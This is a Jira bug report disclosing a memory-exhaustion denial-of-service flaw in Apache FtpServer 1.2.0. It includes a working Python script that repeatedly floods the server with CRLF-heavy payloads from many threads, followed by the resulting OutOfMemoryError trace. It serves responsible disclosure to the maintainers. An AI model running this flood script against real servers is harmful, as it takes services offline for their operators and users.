Ardu created FTPSERVER-517:
------------------------------
Summary: The memory of FtpServer can be easily filled up, causing a DoS threat
Key: FTPSERVER-517
URL: https://issues.apache.org/jira/browse/FTPSERVER-517
Project: FtpServer
Issue Type: Bug
Components: Core, Server
Affects Versions: 1.2.0
Environment: docker Ubuntu 20.04.3 LTS
FtpServer version 1.2.0
java version "1.8.0_341"
Java(TM) SE Runtime Environment (build 1.8.0_341-b10)
Java HotSpot(TM) 64-Bit Server VM (build 25.341-b10, mixed mode)
Reporter: Ardu
Attachments: apacheftp_atk.py
Hi, I found that the memory of FtpServer can be easily filled up with a lot of
"\r\n" sequences. It shows that sending a long sequence with a lot of "\r\n" to
the server can easily make the server's Java heap space run out of memory and make
the server unavailable. It seems there is an issue in the memory control and
command processing. This may be a threat and be exploited by attackers to perform a DoS
attack.
For a similar threat, refer to
CVE-2017-7651 [https://bugs.eclipse.org/bugs/show_bug.cgi?id=529754]
h2. Attack simulation
h3. Run server
{code:bash}
bin/ftpd.sh{code}
h3. Run attack script
The attack script (in Python) looks like:
{code:python}
import socket
import threading
import time

ip_address = "0.0.0.0"
port = 12345
payload = b"\r\n" * 1000000   # triggers the OutOfMemoryError
# payload = b"aa" * 1000000   # does not trigger it

def send_attack():
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    soc.connect((ip_address, port))
    soc.sendall(payload)
    soc.close()

while True:
    for i in range(50):
        t = threading.Thread(target=send_attack)
        t.daemon = True
        t.start()
    time.sleep(1){code}
h2. Result
The server becomes unavailable and outputs:
{code:java}
Exception in thread "pool-1-thread-39" java.lang.OutOfMemoryError: Java heap space
	at java.nio.HeapByteBuffer.<init>(HeapByteBuffer.java:57)
	at java.nio.ByteBuffer.allocate(ByteBuffer.java:335)
	at org.apache.mina.core.buffer.SimpleBufferAllocator.allocateNioBuffer(SimpleBufferAllocator.java:42)
	at org.apache.mina.core.buffer.SimpleBufferAllocator.allocate(SimpleBufferAllocator.java:34)
	at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:235)
	at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:218)
	at org.apache.mina.core.polling.AbstractPollingIoProcessor.read(AbstractPollingIoProcessor.java:508)
	at org.apache.mina.core.polling.AbstractPollingIoProcessor.access$1200(AbstractPollingIoProcessor.java:68)
	at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1224)
	at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1213)
	at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.run(AbstractPollingIoProcessor.java:683)
	at org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.java:64)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:750)
{code}
--
This message was sent by Atlassian Jira
(v8.20.10#820010)